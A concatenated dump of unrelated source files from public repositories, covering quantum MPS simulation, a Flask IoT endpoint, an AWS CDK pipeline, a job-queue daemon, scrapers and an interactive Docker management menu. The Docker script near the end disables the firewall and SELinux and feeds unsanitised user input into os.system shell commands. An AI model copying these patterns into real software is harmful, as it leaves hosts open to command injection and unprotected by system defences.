defaultdict\nfrom qsim.mps.hamiltonians import create_magnetisation_mpo\nfrom qsim.exact.state_vectors import state_vectors_one_to_many\nfrom qsim.mps.state_vectors import normalise_mps, evaluate_mps\nimport copy\n\n\ndef do_mpo_on_mps(mpo, mps):\n \"\"\"\n Applies the mpo to the mps and returns the new mps without truncation\n Args:\n mpo: mpo array of length \"qubit_num\" with (local)\n shape (b_{k-1}, b_{k}, sigma_{k}^{'}, sigma_{k})\n mps: mps array of length \"qubit_num\" with (local)\n shape (sigma_{k}, a_{k-1}, a_{k})\n Returns:\n new_mps: mps array of length \"qubit_num\" with (local)\n shape (sigma_{k}, b_{k-1}*a_{k-1}, b_{k}*a_{k})\n \"\"\"\n if len(mpo) != len(mps):\n raise Exception('mpo length != mps length')\n new_mps = [[]] * len(mps)\n for i, o in enumerate(mpo):\n d = mps[i].shape[0]\n a1, a2 = mps[i].shape[1:]\n b1, b2 = o.shape[:2]\n s = np.tensordot(o, mps[i], axes=1)\n s = np.moveaxis(s, [2, 0, 3, 1, 4], [0, 1, 2, 3, 4])\n new_mps[i] = s.reshape(d, b1 * a1, b2 * a2)\n return new_mps\n\n\ndef projection(mps, axis='Z'):\n \"\"\"\n Function which finds the projections for a set of mps states onto an axis\n Args:\n mps_list: state vectors list with shape (qubit_num, 2, a0, a1)\n axis for the qubits to be projected onto 'X', 'Y' or 'Z' (default Z)\n Returns:\n projection onto axis shape (qubit_num)\n \"\"\"\n qubit_num = len(mps)\n projections = np.zeros(qubit_num)\n for q in range(qubit_num):\n projection_mat = create_magnetisation_mpo(qubit_num, q, axis=axis)\n final_state = do_mpo_on_mps(projection_mat, mps)\n projections[q] = 2 * np.real(find_overlap(final_state, mps))\n return projections\n\n\ndef find_overlap(mps1, mps2):\n \"\"\"\n Function which finds overlap of two states in mps form\n Args:\n mps1: mps array of length \"qubit_num\" with (local)\n shape (sigma_{k}, a_{k-1}, a_{k})\n mps2: mps array of length \"qubit_num\" with (local)\n shape (sigma_{k}, a_{k-1}, a_{k})\n Returns:\n norm/overlap\n \"\"\"\n if len(mps1) != len(mps2):\n raise Exception('mps1 length != mps2 length')\n norm = np.ones([1, 1])\n for i in range(len(mps1)):\n norm = np.tensordot(np.conjugate(mps1[i]), np.tensordot(\n norm, mps2[i], axes=([1], [1])), axes=([1, 0], [0, 1]))\n return norm[0, 0]\n\n\ndef find_entropy(mps, k=None):\n \"\"\"\n Finds the entanglement entropy of the mps when cutting the system\n to left of site k\n Args:\n mps: mps array of length \"qubit_num\" with (local)\n shape (sigma_{k}, a_{k-1}, a_{k})\n k: cutting to the left of site k\n (default: middle of the system => entanglement entropy)\n Returns:\n entanglement entropy\n \"\"\"\n if k is None:\n k = int(np.floor(len(mps) / 2))\n mps, sing_vals = normalise_mps(mps, direction='S', k=k)\n entropy = -1 * sum([i**2 * np.log(i**2) for i in sing_vals if abs(i) > 0])\n return entropy\n\n\ndef time_evolution(initial_mps, mpo_method_list, time_step, time, max_d=None,\n print_out=False, measurements=None, **kwargs):\n \"\"\"\n Evolve mps over a certain time (\"time\") with finite time-step (\"time_step\")\n with unitary mpo specified by mpo_method_list\n Args:\n initial_mps: mps array of length \"qubit_num\" with (local)\n shape (sigma_{k}, a_{k-1}, a_{k})\n mpo_metod_list: list of mpo methods to create mpo array of length\n \"qubit_num\" with (local) shape\n (b_{k-1}, b_{k}, sigma_{k}^{'}, sigma_{k})\n to be applied at each time step\n time_step: size for each method to be applied\n total time\n max_d: (optional) dimension to truncate mps to at each step,\n if not specified mps will grow with each step\n print_out: (bool default False), print intermediary states\n measurements: (list), what to keep at each time step\n **kwargs to be passed to mpo_methods\n\n Returns\n outputs: dict\n \"\"\"\n meas = defaultdict(lambda: False)\n meas.update(dict.fromkeys(measurements, True))\n qubit_num = len(initial_mps)\n points = round(time / time_step + 1)\n time_array = np.linspace(0, time, points)\n outputs = {}\n outputs['initial_state'] = initial_mps\n outputs['time'] = time_array\n if meas['intermediary_states']:\n outputs['intermediary_states'] = [[]] * points\n outputs['intermediary_states'][0] = initial_mps\n if meas['entanglement_entropy']:\n outputs['entanglement_entropy'] = [[]] * points\n outputs['entanglement_entropy'][0] = find_entropy(initial_mps)\n if meas['X_projection']:\n outputs['X'] = [[]] * points\n outputs['X'][0] = projection(initial_mps, axis='X')\n if meas['Y']:\n outputs['Y'] = [[]] * points\n outputs['Y'][0] = projection(initial_mps, axis='Y')\n if meas['Z']:\n outputs['Z'] = [[]] * points\n outputs['Z'][0] = projection(initial_mps, axis='Z')\n mpo_list = [mpo_method(qubit_num=qubit_num, t=time_step, **kwargs)\n for mpo_method in mpo_method_list]\n if print_out:\n print('initial_state: ' + state_vectors_one_to_many(\n evaluate_mps(initial_mps), as_str=True))\n mps = copy.deepcopy(initial_mps)\n for i in range(1, points):\n for mpo in mpo_list:\n mps = do_mpo_on_mps(mpo, mps)\n mps = normalise_mps(mps, direction='R')\n mps = normalise_mps(mps, direction='L', max_d=max_d)\n if meas['intermediary_states']:\n outputs['intermediary_states'][i] = mps\n if meas['entanglement_entropy']:\n outputs['entanglement_entropy'][i] = find_entropy(mps)\n if meas['X']:\n outputs['X'][i] = projection(mps, axis='X')\n if meas['Y']:\n outputs['Y'][i] = projection(mps, axis='Y')\n if meas['Z']:\n outputs['Z'][i] = projection(mps, axis='Z')\n if print_out:\n print('time, state, {}'.format(\n time_array[i],\n state_vectors_one_to_many(evaluate_mps(mps), as_str=True)))\n outputs['final_state'] = mps\n return outputs\n","repo_name":"nataliejpg/Qsim","sub_path":"qsim/mps/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":6328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42925864957","text":"from flask import Flask, render_template, request, jsonify, redirect, url_for\nimport requests\nfrom markupsafe import escape\nimport datetime\n# import Adafruit_DHT\n\napp = Flask(__name__)\n\nnow = datetime.datetime.now()\ntimestring = now.strftime(\"%Y-%m-%d %H:%M\")\nglobal keepPublishing\nkeepPublishing = True\n\n@app.route(\"/\")\ndef main():\n templateData = {\n \"time\": now,\n \"title\": \"Rest_API\",\n \"isPublishing\": False\n }\n return render_template(\"index.html\", **templateData)\n\n@app.route(\"/sensorData\")\ndef sensorData():\n hum, temp = 0,1\n # hum, temp = Adafruit_DHT.read_retry(11, 4)\n if hum is not None and temp is not None:\n return jsonify({'temperature': temp,'humidity':hum})\n else:\n return jsonify({'error': 'Sensor not working.'})\n\n@app.route(\"/publish\", methods=['POST'])\ndef publish():\n writeApi = request.form.get(\"writeApi\")\n hum, temp = 0,1\n # hum, temp = Adafruit_DHT.read_retry(11, 4)\n data = \"field1=\"+str(temp)+\"&field2=\"+str(hum)+\"&status=mqttpublish\"\n pub_data = \"Temperature = {}, Humidity = {}\".format(temp,hum)\n if hum is not None and temp is not None:\n requests.get(\"https://api.thingspeak.com/update?api_key=\"+writeApi+\"&\"+data)\n templateData = {\n \"time\": now,\n \"title\": \"Rest_API\",\n \"isPublishing\": True,\n \"writeApi\": writeApi,\n \"data\": pub_data\n }\n else:\n templateData = {\n \"time\": now,\n \"title\": \"Rest_API\",\n \"isPublishing\": False\n }\n return render_template(\"index.html\", **templateData)\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","repo_name":"vivekkr2001/Internet_of_Things","sub_path":"q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"3612695804","text":"import torch.nn as nn\nimport torch\n\nfrom utils import build_targets\n\n\nclass YoloLoss(nn.Module):\n def __init__(self, lambda_coord=5, lambda_noobject=0.5, image_size=448):\n super().__init__()\n self.lambda_coord = lambda_coord\n self.lambda_noobject = lambda_noobject\n self.epsilon = 1e-5\n\n self.grid_size = image_size // 64\n\n def forward(self, y_pred, y_true):\n y_true = build_targets(y_pred, self.grid_size)\n batch_size = y_pred.size(0)\n y_pred = y_pred.view(size=(batch_size, self.grid_size, self.grid_size, -1))\n print(y_pred.size())\n\n\ngrid = 7\nnum_class = 2\nnum_box = 2\ny_pred = torch.rand((2, grid * grid * (num_box * 5 + num_class)))\nloss = YoloLoss()\n\ny_true = torch.rand((2, 5))\nloss(y_pred, None)\n","repo_name":"vanloc19bk96/yolov1","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8735039534","text":"from itertools import product\nfrom queue import Queue\n\nwith open(\"day_11/input.txt\") as file:\n board = [[int(n) for n in line.strip()] for line in file.readlines()]\n\nSIZE_X = len(board[0])\nSIZE_Y = len(board)\n\nSTEPS = 100\n\ntotal_flashes = 0\n\nfor _ in range(STEPS):\n for x0, y0 in product(range(SIZE_X), range(SIZE_Y)):\n board[x0][y0] += 1\n\n # Only if it is equal to 10 as it can only flash once per step\n if board[x0][y0] == 10:\n flash_queue = Queue()\n flash_queue.put((x0, y0))\n\n while not flash_queue.empty():\n x0, y0 = flash_queue.get()\n total_flashes += 1\n\n for dx, dy in product((-1, 0, 1), (-1, 0, 1)):\n x = x0 + dx\n y = y0 + dy\n\n # Bound check\n if not (0 <= x < SIZE_X and 0 <= y < SIZE_Y):\n continue\n\n board[x][y] += 1\n\n # Check if this new cell flashed\n if board[x][y] == 10:\n flash_queue.put((x, y))\n\n # Normalize back to 0\n for x, y in product(range(SIZE_X), range(SIZE_Y)):\n if board[x][y] > 10:\n board[x][y] = 0\n\nprint(total_flashes)\n","repo_name":"Akarys42/aoc-2021","sub_path":"day_11/part_1.py","file_name":"part_1.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3996582947","text":"import asyncio\nimport logging\nfrom queue import Queue\nimport threading\nimport time\nfrom typing import *\nfrom uuid import uuid4\n\nimport stopit\n\nfrom citrine_daemon import errors, package\nfrom citrine_daemon.server.json import CitrineEncoder\n\n\nlogger = logging.getLogger(__name__)\n\nprimary_job_queue = Queue(maxsize=1000)\njob_cache_hold_time = 60\njob_cache: Dict[str, 'AsyncFuture'] = {}\n\nthread_local = threading.local()\nthread_local.active_job = None\n\nuuid = lambda: str(uuid4()).replace('-', '')\n# TODO janitor\n# Old results (in fs / db), old futures, old packages should be cleaned up at a configurable interval\n\n\nclass FutureState:\n INITIALIZED = 0\n RUNNING = 1\n DONE = 2\n ERROR = -1\n INTERRUPTED = -2\n\n @staticmethod\n def get_msg(state):\n return {\n FutureState.INITIALIZED: 'Initializing',\n FutureState.RUNNING: 'In Progress',\n FutureState.DONE: 'Done',\n FutureState.ERROR: 'Error',\n FutureState.INTERRUPTED: 'Interrupted',\n }.get(state)\n\n\nclass AsyncFuture(object):\n \"\"\"\n Utility for crossing thread boundaries from within an asyncio event loop\n \"\"\"\n \n def __init__(self, fn, args=None, kwargs=None, request_info=None):\n self.fn = fn\n self.args = args or ()\n self.kwargs = kwargs or {}\n self.request_info = request_info\n self.cache_expire = None\n \n self.result_val = None\n self.result_exc = None\n self.extra_data = {}\n\n self.uid = uuid() # type: str\n self.thread = None\n # initialized -> running, interrupted\n # running -> done, error, interrupted\n self.state = FutureState.INITIALIZED\n self._state_lock = threading.Lock()\n\n self._done = asyncio.Event()\n _event_set = self._done.set\n _threadsafe_call = asyncio.get_running_loop().call_soon_threadsafe\n self.set_done = lambda: _threadsafe_call(_event_set)\n job_cache[self.uid] = self\n \n def run(self, thread):\n logger.debug('Executing async job')\n if self.state != FutureState.INITIALIZED:\n return\n try:\n self.thread = thread # Once this is set, thread can be interrupted\n self.transition(FutureState.RUNNING)\n self.result_val = self.fn(*self.args, **self.kwargs)\n self.transition(FutureState.DONE)\n logger.debug('Async job complete')\n except errors.JobInterrupted as e:\n self.result_exc = e\n logger.info('Async job interrupted')\n except Exception as e:\n self.transition(FutureState.ERROR)\n self.result_exc = e\n logger.warning('Async job failed')\n\n self.set_done()\n \n def transition(self, to_state: int):\n with self._state_lock:\n self.state = to_state\n \n def interrupt(self):\n with self._state_lock:\n if self.state == FutureState.RUNNING:\n stopit.async_raise(self.thread.ident, errors.JobInterrupted('Interrupted by user'))\n if self.state in {FutureState.RUNNING, FutureState.INITIALIZED}:\n self.state = FutureState.INTERRUPTED\n\n async def result(self):\n await self._done.wait()\n if self.result_exc:\n raise self.result_exc\n else:\n return self.result_val\n \n def to_dict(self):\n res = {\n 'uid': self.uid,\n 'status': FutureState.get_msg(self.state),\n 'data': self.extra_data,\n }\n if self.result_exc:\n res['error'] = self.result_exc\n if self.result_val:\n res['result'] = self.result_val\n return res\n \n\nCitrineEncoder.register_encoder(AsyncFuture, lambda fut: fut.to_dict())\n\n\nasync def run_in_worker(fn, args=None, kwargs=None, request_info=None):\n fut = AsyncFuture(fn, args, kwargs, request_info)\n primary_job_queue.put(fut)\n return await fut.result()\n\n\ndef run_async(fn, args=None, kwargs=None, request_info=None):\n fut = AsyncFuture(fn, args, kwargs, request_info)\n logger.debug(f'Queueing async job {fut.uid}', {'async_job_id': fut.uid})\n primary_job_queue.put(fut)\n return fut\n\n\ndef get_future(uid: str) -> AsyncFuture:\n if uid in job_cache:\n return job_cache[uid]\n raise errors.NoSuchJob(f'No such job {uid}', data={'uid': uid})\n\n\ndef get_active_job() -> Optional[AsyncFuture]:\n return getattr(thread_local, 'active_job', None)\n\n\ndef worker_thread(worker_id: int):\n logger.info(f'Worker {worker_id} initialized')\n self = threading.current_thread()\n while True:\n job: AsyncFuture = primary_job_queue.get()\n thread_local.active_job = job\n logger.debug('Worker starting async job')\n package.db.start_connection()\n try:\n job.run(self)\n except errors.JobInterrupted:\n pass\n package.db.end_connection(commit=(job.state == FutureState.DONE))\n job.cache_expire = time.time() + job_cache_hold_time\n logger.debug('Worker finished async job')\n thread_local.active_job = None\n \n \ndef janitor_thread():\n logger.info('Janitor initialized')\n while True:\n time.sleep(job_cache_hold_time)\n t = time.time()\n purge_jobs = []\n for job_id, cached_job in job_cache.items():\n if cached_job.cache_expire is None:\n continue\n if cached_job.cache_expire < t:\n purge_jobs.append(job_id)\n for job_id in purge_jobs:\n job_cache.pop(job_id)\n\n\ndef job_put_extra(key: str, value: any):\n fut: AsyncFuture = thread_local.active_job\n fut.extra_data[key] = value\n\n\ndef init_workers(n_workers: int):\n logger.info('Booting threadpool')\n threadpool = []\n for idx in range(n_workers):\n threadpool.append(threading.Thread(\n name=f'worker-{idx}',\n target=worker_thread,\n args=(idx,),\n daemon=True,\n ))\n [t.start() for t in threadpool]\n threading.Thread(\n name='janitor',\n target=janitor_thread,\n daemon=True,\n ).start()\n","repo_name":"antonpaquin/citrine","sub_path":"citrine-daemon/citrine_daemon/server/parallel.py","file_name":"parallel.py","file_ext":"py","file_size_in_byte":6158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19457409121","text":"# const.py\n\n\"\"\" This module defines project-level constants\"\"\"\n\ngrillTemp = 2\ngrillTempHigh = 3\nprobeTemp = 4\nprobeTempHigh = 5\ngrillSetTemp = 6\ngrillSetTempHigh = 7\nprobeTemp2 = 16\nprobeSetTemp2 = 18\ncurveRemainTime = 20\nwarnCode = 24\nprobeSetTemp = 28\nprobeSetTempHigh = 29\ngrillState = 30\ngrillMode = 31\nfireState = 32\nfileStatePercent = 33\nprofileEnd = 34\ngrillType = 35\npelletAlarm1 = 48\npelletAlarm2 = 50\ngrillStates = {\n 0: 'OFF',\n 1: 'ON',\n 2: 'FAN',\n 3: 'REMAIN',\n }\nfireStates = {\n 0: 'DEFAULT',\n 1: 'OFF',\n 2: 'STARTUP',\n 3: 'RUNNING',\n 4: 'COOLDOWN',\n 5: 'FAIL',\n }\nwarnStates = {\n 0: 'FAN_OVERLOADED',\n 1: 'AUGER_OVERLOADED',\n 2: 'IGNITOR_OVERLOADED',\n 3: 'BATTERY_LOW',\n 4: 'FAN_DISCONNECTED',\n 5: 'AUGER_DISCONNECTED',\n 6: 'IGNITOR_DISCONNECTED',\n 7: 'LOW_PELLET',\n }\ncommands ={\n 'on':'UK001!',\n 'off':'UK004!',\n 'status':'UR001!',\n 'id':'UL!',\n 'tempSet':{\n 'grill':'UT',\n 'probe1':'UF',\n 'probe2':'Uf',\n }\n}","repo_name":"mckaycr/greenmountaingrill","sub_path":"gmg/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35520082317","text":"from aws_cdk import(\n core,\n aws_lambda,\n aws_codebuild as codebuild,\n aws_codepipeline as codepipeline,\n aws_codepipeline_actions as codepipeline_actions,\n aws_iam as iam,\n aws_secretsmanager as secretsmanager\n)\n\nowner = \"takeru911\"\nrepo_name = \"cdk-lambda\"\ntag = \"my-cicd\"\ntarget_function_name = \"sample-function\"\n\nclass MyCicdStack(core.Stack):\n\n def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:\n super().__init__(scope, id, **kwargs)\n\n # The code that defines your stack goes here\n for stage in [\"prd\", \"dev\"] :\n target_function = self.create_function(stage)\n project = self.create_project(target_function, stage)\n source_output = codepipeline.Artifact(self.create_name(stage));\n branch = \"master\" if stage == \"prd\" else \"develop\"\n codepipeline.Pipeline(self, self.create_id(\"Pipeline\", stage),\n pipeline_name=self.create_name(stage),\n stages=[\n codepipeline.StageProps(\n stage_name=\"Source\",\n actions=[self.create_source_action(branch, source_output)]),\n codepipeline.StageProps(\n stage_name=\"Build\",\n actions=[self.create_build_action(project, source_output)])\n ])\n\n def create_id(self, name, stage):\n return \"-\".join([tag, name, stage])\n\n def create_name(self, stage):\n return \"_\".join([tag, stage])\n \n def create_function(self, stage):\n return aws_lambda.Function(\n self,\n self.create_id(\"Target\", stage),\n function_name=target_function_name + \"_\" + stage,\n code=aws_lambda.Code.asset(\"dmy\"),\n handler=\"main.handle\",\n runtime=aws_lambda.Runtime.PYTHON_3_6\n )\n\n def create_project(self, target_function, stage):\n project = codebuild.PipelineProject(\n self,\n self.create_id(\"Project\", stage),\n project_name=self.create_name(stage),\n environment_variables={\n \"FUNCTION_NAME\": codebuild.BuildEnvironmentVariable(\n value=target_function.function_name,\n type=codebuild.BuildEnvironmentVariableType.PLAINTEXT),\n \"STAGE\": codebuild.BuildEnvironmentVariable(\n value=stage,\n type=codebuild.BuildEnvironmentVariableType.PLAINTEXT)\n }\n )\n project.add_to_role_policy(\n iam.PolicyStatement(\n resources=[target_function.function_arn],\n actions=['lambda:UpdateFunctionCode',\n 'lambda:UpdateFunctionConfiguration']\n )\n )\n return project\n\n def create_source_action(self, branch, source_output):\n secret = secretsmanager.Secret.from_secret_attributes(self,\n branch + \"_secret\",\n secret_arn=\"arn:aws:secretsmanager:ap-northeast-1:044768335503:secret:github-api-token-wtevPt\")\n oauth_token = secret.secret_value_from_json(\"github-api-token\")\n\n return codepipeline_actions.GitHubSourceAction(\n action_name=\"GithubRepo\",\n oauth_token=oauth_token,\n output=source_output,\n owner=owner,\n repo=repo_name,\n branch=branch\n )\n\n def create_build_action(self, project, source_output):\n action_name = \"CodeBuild\"\n return codepipeline_actions.CodeBuildAction(\n action_name=action_name,\n project=project,\n input=source_output,\n outputs=[codepipeline.Artifact(\"Test\")]\n )\n\n","repo_name":"takeru911/cdk-cicd","sub_path":"my_cicd/my_cicd_stack.py","file_name":"my_cicd_stack.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21047414323","text":"import six\n\n\nclass DataIterator(six.Iterator):\n \"\"\"An iterator over data, representing a single epoch.\n\n Parameters\n ----------\n data_stream : :class:`DataStream` or :class:`Transformer`\n The data stream over which to iterate.\n request_iterator : iterator\n An iterator which returns the request to pass to the data stream\n for each step.\n\n \"\"\"\n def __init__(self, data_stream, request_iterator=None, as_dict=False):\n self.data_stream = data_stream\n self.request_iterator = request_iterator\n self.as_dict = as_dict\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.request_iterator is not None:\n data = self.data_stream.get_data(next(self.request_iterator))\n else:\n data = self.data_stream.get_data()\n if self.as_dict:\n return dict(zip(self.data_stream.sources, data))\n else:\n return data\n","repo_name":"lramach/fuel-datasets","sub_path":"iterator.py","file_name":"iterator.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32557733328","text":"#!/usr/bin/env python\nimport numpy as np\nimport os\n# from m2m_manga_utils import write_mge\n# from m2m_manga_utils import symmetrize_velfield\n# import util_config as uc\nfrom m2m_data_bin_util import create\nimport pyfits\nfrom optparse import OptionParser\n\n\nif __name__ == '__main__':\n parser = OptionParser()\n parser.add_option('-g', action='store', type='string',\n dest='gname', default=None, help='galaxy name')\n parser.add_option('-m', action='store', type='string',\n dest='mname', default=None, help='model name')\n parser.add_option('-s', action='store_false', dest='symmetrize',\n default=True, help='model name')\n (options, args) = parser.parse_args()\n gname = options.gname\n if options.mname is None:\n mname = gname\n else:\n mname = options.mname\n\n lhy = create(mname, folder=gname)\n with open('{}/auxiliary_data/information.dat'.format(gname), 'r') as ff:\n ang = float(ff.readline())\n eps = float(ff.readline())\n dist = float(ff.readline())\n Re_arcsec = float(ff.readline())\n mge = np.genfromtxt(\n '{}/MGE{}/m2m_mge_lum'.format(gname, mname),\n skip_header=1)\n hdulist = pyfits.open('{}/auxiliary_data/IFU.fits'.format(gname))\n data1 = hdulist[1].data\n data2 = hdulist[2].data\n x0 = data1['xbin']\n y0 = data1['ybin']\n tem_rebin_x = data2['rebin_x']\n tem_rebin_y = data2['rebin_y']\n\n pa = np.radians(ang - 90.0)\n xbin = np.cos(pa)*x0-np.sin(pa)*y0 + 1e-6\n ybin = np.sin(pa)*x0+np.cos(pa)*y0 - 1e-6\n rebin_x = np.cos(pa) * tem_rebin_x - np.sin(pa) * tem_rebin_y\n rebin_y = np.sin(pa) * tem_rebin_x + np.cos(pa) * tem_rebin_y\n\n r = (xbin**2 + ybin**2)**0.5\n ii = r < 3.0\n v0 = data1['v0']\n vel = v0 - v0[ii].mean()\n # rotate the data until velocity have positive value for x < 0\n iii = xbin < 0.0\n rotate = vel[iii].mean()\n if rotate < 0.0:\n pa = np.radians(ang - 90.0 + 180.0)\n xbin = np.cos(pa)*x0-np.sin(pa)*y0\n ybin = np.sin(pa)*x0+np.cos(pa)*y0\n rebin_x = np.cos(pa) * tem_rebin_x - np.sin(pa) * tem_rebin_y\n rebin_y = np.sin(pa) * tem_rebin_x + np.cos(pa) * tem_rebin_y\n v0_err = data1['v0_err'].clip(2.0, 200.0)\n # v0_err = np.zeros_like(vel) + 15.0\n vd = data1['vd']\n vd_err = data1['vd_err'].clip(2.0, 200.0)\n IFU_Z = data1['metal']\n IFU_Z_err = IFU_Z * 0.05\n # vd_err = (vd.copy() * 0.05).clip(6.0)\n # h3 = data1['h3']\n # h3_err = data1['h3_err']\n # h4 = data1['h4']\n # h4_err = data1['h4_err']\n\n mask_filename = '{}/auxiliary_data/IFU_mask.fits'.format(gname)\n if os.path.exists(mask_filename):\n mask = pyfits.open(mask_filename)[0].data\n else:\n mask = np.zeros_like(xbin, dtype=int)\n goodbins = (mask == 0).astype(int)\n\n # mge[:,0] = mge[:,0] / (2.0 * np.pi * mge[:,1]**2 * mge[:,2])\n # do not use this again, it has been included in the create_data_bin.py\n # file\n lhy.surface_brightness(mge)\n inc_deg = lhy.xconfig.getfloat('sec:Model', 'inclination')\n lhy.luminosity_density(mge, inc_deg)\n lhy.IFU(xbin, ybin, vel=vel, vel_err=v0_err, disp=vd, disp_err=vd_err,\n # h3=h3, h3_err=h3_err, h4=h4, h4_err=h4_err,\n rebin_x=rebin_x, rebin_y=rebin_y,\n dist=dist, n_part=300000, plot=False, Re=Re_arcsec, good=goodbins,\n symmetrize=options.symmetrize, vertexStep=1)\n lhy.specline('IFU_Z', xbin, ybin, IFU_Z*1, IFU_Z_err*1)\n","repo_name":"HongyuLi2016/lhy_m2m_utilities","sub_path":"MaNGA/m2m-make_manga_data.py","file_name":"m2m-make_manga_data.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70225799875","text":"from time import time\nfrom database import *\nfrom scrapper import Scrapper\n\n\n@db_session\ndef get_words(start_index):\n words = []\n for w in Words.select().order_by(Words.word).limit(10, start_index):\n words.append(w.word)\n\n return words\n\n\n@db_session\ndef scrape_words(words, scrapper):\n for word in words:\n connected = scrapper.scrape(word)\n if connected:\n update_word(word, scrapper.audio(), scrapper.details())\n for line in scrapper.examples():\n save_sentence(word, line)\n\n print('--------------saved----------------')\n\n\ndef update_word(word, audio, details):\n \"\"\"should be called from inside function with db_session\"\"\"\n row = Words.get(word=word)\n if row:\n row.set(audio=audio, details=details)\n\n\ndef save_sentence(word, sentence):\n row = Examples.select(lambda c: c.word == word and c.sentence == sentence).exists()\n if not row:\n Examples(word=word, sentence=sentence)\n\n\ndef main():\n start_time = time()\n scrapper = Scrapper()\n for index in range(1482, 2000, 10):\n print(\"scrapping started from {}\".format(index))\n words = get_words(index)\n scrape_words(words, scrapper)\n\n scrapper.close()\n print(\"duration: {}\".format(time() - start_time))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mahabubulhasan/word-parser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22397019535","text":"import subprocess as sp\nimport os\nwhile True:\n\t\t#form = cgi.FieldStorage()\n\t\tprint(\"Press 1 to launch docker container\\nPress 2 to start docker services\\nPress 3 to see status of docker services\\nPress 4 to attach docker container\\nPress 5 to configure web server on running docker container\\nPress 6 to setup python3 on running docker container\\nPress 7 to know the IP Address of running docker container\\nPress 8 to start docker container\\nPress 9 to kill dokcer container\\nPress 10 to know status of all docker containers\\nPress 11 to see the running docker containers\\nPress 12 to copy files from base os to docker container\\nPress 13 to see docker images\\nPress 14 to download docker os images\\nPress 15 to install docker\\nPress 16 to remove stopped docker conatiner\\nPress 17 to remove all stopped containers\\nPress 20 to exit\")\n\t\tchoice = input(\"\\n\\n\\nEnter your choice: \")\n\t\tif int(choice)==1:\n\n\t\t\tosname = input(\"Enter the osname: \")\n\t\t\tosimage = input(\"Enter os image: \")\n\t\t\t#print(osname)\n\n\n\t\t\tcmd = \"docker run -d -i -t --name {0} {1}\".format(osname,osimage)\n\n\n\t\t\toutput = sp.getstatusoutput(cmd)\n\n\t\t\tstatus = output[0]\n\t\t\tout = output[1]\n\n\n\t\t\tif status == 0:\n\t\t\t print(\"Your required {1} launched named {0}\".format(osname,osimage))\n\t\t\telse:\n\t\t\t print(\"Error occured : {}\".format(out))\n\t\telif int(choice)==2:\n\t\t\tos.system(\"systemctl stop firewalld\")\n\t\t\tos.system(\"setenforce 0\")\n\t\t\tos.system(\"systemctl start docker\")\n\t\telif int(choice)==3:\n\t\t\tos.system(\"systemctl status docker\")\n\t\t\n\t\telif int(choice)==4:\n\t\t\tidname=input(\"Enter os name or container id: \")\n\t\t\tos.system(\"docker attach {}\".format(idname))\n\t\telif int(choice)==5:\n\t\t\tidname=input(\"Enter os name or container id: \")\n\t\t\tos.system(\"docker exec {} yum install httpd -y\".format(idname))\n\t\t\tos.system(\"docker exec {} /usr/sbin/httpd\".format(idname))\n\t\telif int(choice)==6:\n\t\t\tidname=input(\"Enter os name or container id: \")\n\t\t\tos.system(\"docker exec {} yum install python3 -y\".format(idname))\n\t\telif int(choice)==7:\n\t\t\tidname=input(\"Enter os name or container id: \")\n\t\t\tos.system(\"docker inspect {} | grep \\\"IPAddress\\\"\".format(idname))\n\t\telif int(choice)==8:\n\t\t\tidname=input(\"Enter os name or container id: \")\n\t\t\tos.system(\"docker start {}\".format(idname))\n\t\telif int(choice)==9:\n\t\t\tidname=input(\"Enter os name or container id: \")\n\t\t\tos.system(\"docker kill {}\".format(idname))\n\t\telif int(choice)==10:\n\t\t\tos.system(\"docker ps -a\")\n\t\telif int(choice)==11:\n\t\t\tos.system(\"docker ps\")\n\t\telif int(choice)==12:\n\t\t\tidname=input(\"Enter os name or container id: \")\n\t\t\tsourcpath=input(\"Enter the file name with path which you want to copy: \")\n\t\t\tdestpath=input(\"Enter the path in docker container: \")\n\t\t\tos.system(\"docker cp {} {}:{}\".format(sourcpath,idname,destpath))\n\t\telif int(choice)==13:\n\t\t\tos.system(\"docker images\")\n\t\telif int(choice)==14:\n\t\t\tdown=input(\"Enter the os image name: \")\n\t\t\tos.system(\"docker pull {}\".format(down))\n\t\telif int(choice)==15:\n\t\t\tdock=os.system(\"\"\"echo '[docker]\\nname=docker package\\nbaseurl=https://download.docker.com/linux/centos/7/x86_64/stable/\\ngpgcheck=0' >> /etc/yum.repos.d/docker.repo\"\"\")\n\t\t\tos.system(\"yum repolist\")\n\t\t\tos.system(\"yum install docker-ce --nobest -y\")\n\t\t\tos.system(\"systemctl start docker\")\n\t\telif int(choice)==16:\n\t\t\trem=input(\"Enter os name or container id: \")\n\t\t\tos.system(\"docker rm {}\".format(rem))\n\t\telif int(choice)==17:\n\t\t\tos.system(\"docker rm `docker ps -aq`\")\n\t\telif int(choice)==20:\n\t\t\texit()\n\t\telse:\n\t\t\tprint(\"can't understand\")\n\t\tinput(\"click Enter to 